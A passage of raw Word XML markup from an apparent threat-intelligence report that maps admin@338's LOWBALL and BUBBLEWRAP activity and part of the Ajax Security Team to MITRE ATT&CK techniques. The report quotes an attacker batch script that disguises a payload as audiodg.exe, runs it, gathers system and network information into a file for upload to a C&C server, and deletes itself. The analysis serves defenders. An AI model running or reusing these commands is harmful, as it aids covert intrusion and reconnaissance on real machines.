        <w:t xml:space="preserve"> Permission Groups Discovery: Local Groups </w:t>
      </w:r>
      <w:r w:rsidR="00FC24BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331E24DA" w14:textId="5D98F52F" w:rsidR="008F5F59" w:rsidRPr="00B412A1" w:rsidRDefault="008F5F59" w:rsidP="00B412A1">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&gt; %temp%\download</w:t>
      </w:r>
      <w:r w:rsidR="003B17D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003B17D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="003B17D8" w:rsidRPr="003B17D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003B17D8" w:rsidRPr="003B17D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1049 System Network Connections Discovery</w:t>
      </w:r>
      <w:r w:rsidR="003B17D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6292B8" w14:textId="5AD57491" w:rsidR="00EF1C75" w:rsidRDefault="00EF1C75" w:rsidP="00575C9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="090516"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Results stored in file and uploaded to C&amp;C server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AB7E1F" w14:textId="41CF2012" w:rsidR="00EF1C75" w:rsidRDefault="00EF1C75" w:rsidP="00EF1C75">
      <w:r w:rsidRPr="00EF1C75">
        <w:t xml:space="preserve">These commands allow the threat group to gain information about the compromised computer and the network to which it belongs. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6171DC49" w14:textId="0F124541" w:rsidR="00EF1C75" w:rsidRDefault="00EF1C75" w:rsidP="00EF1C75">
      <w:r w:rsidRPr="00EF1C75">
        <w:t>Using this information, they can decide to explore further or instruct the compromised computer to download additional malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF787DC" w14:textId="66B3C3BA" w:rsidR="00EF1C75" w:rsidRDefault="00EF1C75" w:rsidP="00EF1C75">
      <w:r>
        <w:t xml:space="preserve">Download second stage malware BUBBLEWRAP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF1C75">
        <w:t>Backdoor.APT.FakeWinHTTPHelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238573C0" w14:textId="25945B74" w:rsidR="00B412A1" w:rsidRDefault="00EF1C75" w:rsidP="00EF1C75">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF1C75">
        <w:t xml:space="preserve">BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF1C75">
        <w:t>This backdoor collects</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF1C75">
        <w:t xml:space="preserve"> system information, including the operating </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF1C75">
        <w:lastRenderedPageBreak/>
        <w:t>system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47854A4E" w14:textId="5F807205" w:rsidR="00E61CF2" w:rsidRDefault="00E61CF2" w:rsidP="00EF1C75">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA301EE" w14:textId="402B3244" w:rsidR="00E61CF2" w:rsidRDefault="00E61CF2" w:rsidP="00EF1C75">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00E61CF2">
        <w:t>The BUBBLEWRAP malware is installed with admin rights and the threat actors gain full access to the compromised machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543429AD" w14:textId="0B5944A5" w:rsidR="004C5547" w:rsidRDefault="004C5547" w:rsidP="00EF1C75">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="004C5547">
        <w:t>The BUBBLEWRAP Trojan may create a hidden system administrator account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB1460" w14:textId="652AFFBF" w:rsidR="00BE5BA7" w:rsidRDefault="00BE5BA7" w:rsidP="00EF1C75">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5BA7">
        <w:t xml:space="preserve">Besides LOWBALL, FireEye also observed admin@338 also employ the BUBBLEWRAP malware, another backdoor, but with far fewer features and </w:t>
      </w:r>
      <w:r w:rsidRPr="0094281B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>no Dropbox integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5BA7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D5D06" w14:textId="3DAD9C56" w:rsidR="00B412A1" w:rsidRDefault="00B412A1" w:rsidP="00B412A1"/>
    <w:p w14:paraId="48535A9F" w14:textId="17B22E2F" w:rsidR="00E61CF2" w:rsidRDefault="00E61CF2" w:rsidP="00B412A1">
      <w:r>
        <w:t>These notes refer to behaviour on the D</w:t>
      </w:r>
      <w:r w:rsidR="00B57A35">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>opbox server not the attacked machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E1D843" w14:textId="77777777" w:rsidR="00E61CF2" w:rsidRDefault="00E61CF2" w:rsidP="00B412A1">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2E91CC" w14:textId="2BA0E79A" w:rsidR="00B412A1" w:rsidRPr="00B412A1" w:rsidRDefault="00B412A1" w:rsidP="00B412A1">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">@echo off </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC6F2DC" w14:textId="108FC7D2" w:rsidR="00B412A1" w:rsidRPr="00B412A1" w:rsidRDefault="00B412A1" w:rsidP="00B412A1">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ren "%temp%\upload" audiodg.exe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E03366">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00E03366" w:rsidRPr="00E03366">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1036.005</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E03366" w:rsidRPr="00E03366">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Masquerading: Match Legitimate Name or Location</w:t>
      </w:r>
      <w:r w:rsidR="00E03366">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C1AFE3" w14:textId="77777777" w:rsidR="00B412A1" w:rsidRPr="00B412A1" w:rsidRDefault="00B412A1" w:rsidP="00B412A1">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> start %temp%\audiodg.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE30B55" w14:textId="77777777" w:rsidR="00B412A1" w:rsidRPr="00B412A1" w:rsidRDefault="00B412A1" w:rsidP="00B412A1">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> d:\ &gt;&gt; %temp%\download </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4EC5B9" w14:textId="77777777" w:rsidR="00B412A1" w:rsidRPr="00B412A1" w:rsidRDefault="00B412A1" w:rsidP="00B412A1">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&gt; %temp%\download </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6286306F" w14:textId="472A358C" w:rsidR="009A05C9" w:rsidRDefault="00B412A1" w:rsidP="00311AA6">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00B412A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> del %0  </w:t>
      </w:r>
      <w:r w:rsidR="009A05C9">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A74B762" w14:textId="7491CF89" w:rsidR="007878A1" w:rsidRDefault="007878A1" w:rsidP="00943069">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc110935499"/>
      <w:bookmarkStart w:id="22" w:name="_Toc153480836"/>
      <w:r w:rsidRPr="009A05C9">
        <w:lastRenderedPageBreak/>
        <w:t>Ajax Security Team</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="0C208692" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="005B4630" w:rsidRDefault="00005982" w:rsidP="00005982">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc153480837"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="3C449453" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00005982" w:rsidRDefault="00005982" w:rsidP="00005982">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0130 - Ajax Security Team is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFB1988" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00005982" w:rsidRDefault="00005982" w:rsidP="00005982">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is Iran</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F4708" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00005982" w:rsidRDefault="00005982" w:rsidP="00005982">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is IR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0624C278"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4530C9"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D7BE4"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1566.003', 'T1566.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B36B0BE" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00005982" w:rsidRDefault="00005982" w:rsidP="00005982">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> via Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C275DD6" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00005982" w:rsidRDefault="00005982" w:rsidP="00005982">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007662B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007662B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007662B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007662B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D47BB66"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1204.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ED1E07" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00005982" w:rsidRDefault="00005982" w:rsidP="00005982">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007662B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007662B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA5FAFC"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9A8CE7"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501C87AE"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718E1186"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1555.003', 'T1056.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7243306C" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00005982" w:rsidRDefault="00005982" w:rsidP="00005982">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1555.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
